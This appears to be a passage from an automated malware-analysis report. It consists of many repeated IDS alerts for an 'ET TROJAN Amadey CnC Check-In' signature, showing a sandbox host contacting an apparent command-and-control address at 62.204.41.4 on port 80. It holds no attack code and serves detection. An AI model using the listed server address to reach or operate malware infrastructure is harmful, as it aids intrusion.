Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449833802027700 02/07/23-20:01:20.483013
SID:	2027700
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450019802027700 02/07/23-20:02:15.689584
SID:	2027700
Source Port:	50019
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449727802027700 02/07/23-20:00:53.058922
SID:	2027700
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450055802027700 02/07/23-20:02:24.503969
SID:	2027700
Source Port:	50055
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449886802027700 02/07/23-20:01:35.832637
SID:	2027700
Source Port:	49886
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450091802027700 02/07/23-20:02:37.622394
SID:	2027700
Source Port:	50091
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450346802027700 02/07/23-20:03:45.861770
SID:	2027700
Source Port:	50346
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449768802027700 02/07/23-20:01:02.811173
SID:	2027700
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450096802027700 02/07/23-20:02:38.862015
SID:	2027700
Source Port:	50096
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449964802027700 02/07/23-20:01:58.773796
SID:	2027700
Source Port:	49964
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450251802027700 02/07/23-20:03:20.007203
SID:	2027700
Source Port:	50251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449923802027700 02/07/23-20:01:46.547163
SID:	2027700
Source Port:	49923
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450292802027700 02/07/23-20:03:32.559192
SID:	2027700
Source Port:	50292
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449881802027700 02/07/23-20:01:34.599060
SID:	2027700
Source Port:	49881
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449878802027700 02/07/23-20:01:34.080304
SID:	2027700
Source Port:	49878
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449976802027700 02/07/23-20:02:01.442060
SID:	2027700
Source Port:	49976
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449722802027700 02/07/23-20:00:51.810569
SID:	2027700
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449771802027700 02/07/23-20:01:03.532617
SID:	2027700
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449915802027700 02/07/23-20:01:43.056279
SID:	2027700
Source Port:	49915
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450050802027700 02/07/23-20:02:23.248250
SID:	2027700
Source Port:	50050
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450133802027700 02/07/23-20:02:51.437305
SID:	2027700
Source Port:	50133
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450387802027700 02/07/23-20:03:55.955538
SID:	2027700
Source Port:	50387
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449805802027700 02/07/23-20:01:13.918183
SID:	2027700
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450341802027700 02/07/23-20:03:44.643209
SID:	2027700
Source Port:	50341
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450326802027700 02/07/23-20:03:40.953159
SID:	2027700
Source Port:	50326
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450424802027700 02/07/23-20:04:05.016891
SID:	2027700
Source Port:	50424
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450243802027700 02/07/23-20:03:17.999930
SID:	2027700
Source Port:	50243
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450105802027700 02/07/23-20:02:41.198188
SID:	2027700
Source Port:	50105
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450071802027700 02/07/23-20:02:32.235512
SID:	2027700
Source Port:	50071
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450007802027700 02/07/23-20:02:12.669391
SID:	2027700
Source Port:	50007
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450359802027700 02/07/23-20:03:49.032956
SID:	2027700
Source Port:	50359
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449743802027700 02/07/23-20:00:56.902351
SID:	2027700
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449841802027700 02/07/23-20:01:22.423646
SID:	2027700
Source Port:	49841
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449997802027700 02/07/23-20:02:10.169392
SID:	2027700
Source Port:	49997
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450178802027700 02/07/23-20:03:02.400607
SID:	2027700
Source Port:	50178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450362802027700 02/07/23-20:03:49.798075
SID:	2027700
Source Port:	50362
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449992802027700 02/07/23-20:02:06.575939
SID:	2027700
Source Port:	49992
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450068802027700 02/07/23-20:02:31.452026
SID:	2027700
Source Port:	50068
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450460802027700 02/07/23-20:04:13.772290
SID:	2027700
Source Port:	50460
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449989802027700 02/07/23-20:02:05.120374
SID:	2027700
Source Port:	49989
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449735802027700 02/07/23-20:00:54.983578
SID:	2027700
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450354802027700 02/07/23-20:03:47.847893
SID:	2027700
Source Port:	50354
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450022802027700 02/07/23-20:02:16.443010
SID:	2027700
Source Port:	50022
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450063802027700 02/07/23-20:02:28.396717
SID:	2027700
Source Port:	50063
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450276802027700 02/07/23-20:03:28.648274
SID:	2027700
Source Port:	50276
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449948802027700 02/07/23-20:01:54.830001
SID:	2027700
Source Port:	49948
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450141802027700 02/07/23-20:02:53.400943
SID:	2027700
Source Port:	50141
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450395802027700 02/07/23-20:03:57.910152
SID:	2027700
Source Port:	50395
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450100802027700 02/07/23-20:02:39.901405
SID:	2027700
Source Port:	50100
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450313802027700 02/07/23-20:03:37.774355
SID:	2027700
Source Port:	50313
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450271802027700 02/07/23-20:03:27.422593
SID:	2027700
Source Port:	50271
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449984802027700 02/07/23-20:02:03.441087
SID:	2027700
Source Port:	49984
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449943802027700 02/07/23-20:01:53.532965
SID:	2027700
Source Port:	49943
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449730802027700 02/07/23-20:00:53.793502
SID:	2027700
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450289802027700 02/07/23-20:03:31.813234
SID:	2027700
Source Port:	50289
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450035802027700 02/07/23-20:02:19.615798
SID:	2027700
Source Port:	50035
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450248802027700 02/07/23-20:03:19.236086
SID:	2027700
Source Port:	50248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450207802027700 02/07/23-20:03:09.251394
SID:	2027700
Source Port:	50207
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450432802027700 02/07/23-20:04:06.987943
SID:	2027700
Source Port:	50432
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450390802027700 02/07/23-20:03:56.676042
SID:	2027700
Source Port:	50390
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450174802027700 02/07/23-20:03:01.410759
SID:	2027700
Source Port:	50174
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450367802027700 02/07/23-20:03:51.006859
SID:	2027700
Source Port:	50367
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449748802027700 02/07/23-20:00:58.128864
SID:	2027700
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450015802027700 02/07/23-20:02:14.676485
SID:	2027700
Source Port:	50015
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450113802027700 02/07/23-20:02:43.134587
SID:	2027700
Source Port:	50113
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450269802027700 02/07/23-20:03:26.932435
SID:	2027700
Source Port:	50269
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450263802027700 02/07/23-20:03:25.380080
SID:	2027700
Source Port:	50263
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450272802027700 02/07/23-20:03:27.657286
SID:	2027700
Source Port:	50272
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450370802027700 02/07/23-20:03:51.805979
SID:	2027700
Source Port:	50370
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450361802027700 02/07/23-20:03:49.565590
SID:	2027700
Source Port:	50361
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449739802027700 02/07/23-20:00:55.935980
SID:	2027700
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450006802027700 02/07/23-20:02:12.401268
SID:	2027700
Source Port:	50006
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450358802027700 02/07/23-20:03:48.800828
SID:	2027700
Source Port:	50358
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449837802027700 02/07/23-20:01:21.459260
SID:	2027700
Source Port:	49837
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450202802027700 02/07/23-20:03:08.029585
SID:	2027700
Source Port:	50202
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450456802027700 02/07/23-20:04:12.818077
SID:	2027700
Source Port:	50456
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450104802027700 02/07/23-20:02:40.952138
SID:	2027700
Source Port:	50104
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449809802027700 02/07/23-20:01:14.874634
SID:	2027700
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450333802027700 02/07/23-20:03:42.674478
SID:	2027700
Source Port:	50333
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450235802027700 02/07/23-20:03:16.065619
SID:	2027700
Source Port:	50235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450431802027700 02/07/23-20:04:06.742108
SID:	2027700
Source Port:	50431
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449910802027700 02/07/23-20:01:41.844449
SID:	2027700
Source Port:	49910
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449977802027700 02/07/23-20:02:01.710756
SID:	2027700
Source Port:	49977
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449723802027700 02/07/23-20:00:52.073819
SID:	2027700
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449879802027700 02/07/23-20:01:34.335804
SID:	2027700
Source Port:	49879
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449821802027700 02/07/23-20:01:17.548025
SID:	2027700
Source Port:	49821
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449812802027700 02/07/23-20:01:15.578134
SID:	2027700
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449968802027700 02/07/23-20:01:59.735492
SID:	2027700
Source Port:	49968
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449770802027700 02/07/23-20:01:03.285971
SID:	2027700
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449767802027700 02/07/23-20:01:02.575091
SID:	2027700
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449882802027700 02/07/23-20:01:34.875626
SID:	2027700
Source Port:	49882
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450440802027700 02/07/23-20:04:08.934141
SID:	2027700
Source Port:	50440
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450291802027700 02/07/23-20:03:32.300203
SID:	2027700
Source Port:	50291
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449971802027700 02/07/23-20:02:00.459434
SID:	2027700
Source Port:	49971
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450244802027700 02/07/23-20:03:18.251405
SID:	2027700
Source Port:	50244
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450429802027700 02/07/23-20:04:06.205613
SID:	2027700
Source Port:	50429
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450339802027700 02/07/23-20:03:44.150750
SID:	2027700
Source Port:	50339
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450043802027700 02/07/23-20:02:21.535774
SID:	2027700
Source Port:	50043
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450297802027700 02/07/23-20:03:33.829768
SID:	2027700
Source Port:	50297
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450132802027700 02/07/23-20:02:51.157888
SID:	2027700
Source Port:	50132
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450173802027700 02/07/23-20:03:01.155358
SID:	2027700
Source Port:	50173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450386802027700 02/07/23-20:03:55.723368
SID:	2027700
Source Port:	50386
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450216802027700 02/07/23-20:03:11.470014
SID:	2027700
Source Port:	50216
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450428802027700 02/07/23-20:04:05.975695
SID:	2027700
Source Port:	50428
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450084802027700 02/07/23-20:02:35.626446
SID:	2027700
Source Port:	50084
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

